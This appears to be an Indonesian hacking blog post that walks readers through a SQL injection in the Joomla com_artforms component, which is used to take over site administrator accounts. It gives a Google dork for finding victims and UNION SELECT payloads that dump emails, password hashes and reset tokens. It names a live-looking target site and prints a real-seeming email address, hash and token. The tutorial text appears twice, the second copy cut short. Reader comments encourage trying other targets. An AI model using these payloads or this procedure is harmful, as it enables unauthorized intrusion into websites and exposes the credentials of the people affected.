Joomla Exploit Token
Rizki Chan Buat tutorial Joomla Dengan Token
inurl:"option com_artforms"
jangan malas mencari -_- di google :D
kita dapat target yaitu :
http://www.avaclean.com/
di exploid
ni kodenya di paste ke target tadi
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
ntar jadi nya kyak gini
http://sitetarget.com// index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,user name,0x3a,password)+from+jos_users--
disitu udah kelihatan emailnya
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWt EsQNqFQPZchh86wvmnO3XIlTOwZ9P
nah open tab lagi ya kk mastah :)
terus
copy code reset pass ini
/index.php?option=com_user&view=reset
terus masukin kode reset paswordnya menjadi seperti ini :
http://www.avaclean.com//index.php?option=com_user&view=reset
setelah itu disuruh masukin email nantinya
masukin email yg kita dapat tadi
yaitu
josh@bkmediagroup.com
setelah di enter
anda disuruh masukin code :
kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi
open tab lagi neh untuk ngambil token nya :)
masukan code ini :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a ,activation)+from+jos_users
ntar jadi nya gini
http://sitetarget.com// index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,a ctivation)+from+jos_users
code nya :
admineda7d6142fac40a533b56407a4617371
nah kita kembali ke halaman reset tadi
kita masukin aja token yang ini
eda7d6142fac40a533b56407a4617371
truss enter :)) eehhh minta password baru dech dia :D
uppzzzzz kita masukin aja dech password kita :))
setelah udah masukin
kita masuk ke halaman admin nya
contoh :
http://sitetarget.com/administrator
nah masukin user nya :) & password kita :Dtheks: bank Rizki Chan
tutorial nya
Rizki Chan Buat tutorial Joomla Dengan Token
inurl:"option com_artforms"
jangan malas mencari -_- di google :D
kita dapat target yaitu :
http://www.avaclean.com/
di exploid
ni kodenya di paste ke target tadi
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--
ntar jadi nya kyak gini
http://sitetarget.com//
disitu udah kelihatan emailnya
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWt
nah open tab lagi ya kk mastah :)
terus
copy code reset pass ini
/index.php?option=com_user&view=reset
terus masukin kode reset paswordnya menjadi seperti ini :
http://www.avaclean.com//index.php?option=com_user&view=reset
setelah itu disuruh masukin email nantinya
masukin email yg kita dapat tadi
yaitu
josh@bkmediagroup.com
setelah di enter
anda disuruh masukin code :
kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi
open tab lagi neh untuk ngambil token nya :)
masukan code ini :
/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
ntar jadi nya gini
http://sitetarget.com//
code nya :
admineda7d6142fac40a533b56407a4617371
nah kita kembali ke halaman reset tadi
kita masukin aja token yang ini
eda7d6142fac40a533b56407a4617371
truss enter :)) eehhh minta password baru dech dia :D
uppzzzzz kita masukin aja dech password kita :))
setelah udah masukin
kita masuk ke halaman admin nya
contoh :
http://sitetarget.com/administrator
nah masukin user nya :) & password kita :Dtheks: bank Rizki Chan
tutorial nya
7 comments:
gmana kalau diminta usename ?
apa yah gan webset nyah ? kalo di minta di kembalikan ajh seperti semula webset nya yang penting jangan gerusak db nya bacup ajh index nya
gan ane dapat token yang ada tanda "$" nya
pas ane coba kok kagak bisa
ohh token yang itu memang gx bisa gan beda versi tapi sik kyak nya yang token ada "$" gx bisa
cari target lain gan
gan kok ngga muncul email si user ya?
COBA CARI TARGET LAEN GAN
Post a Comment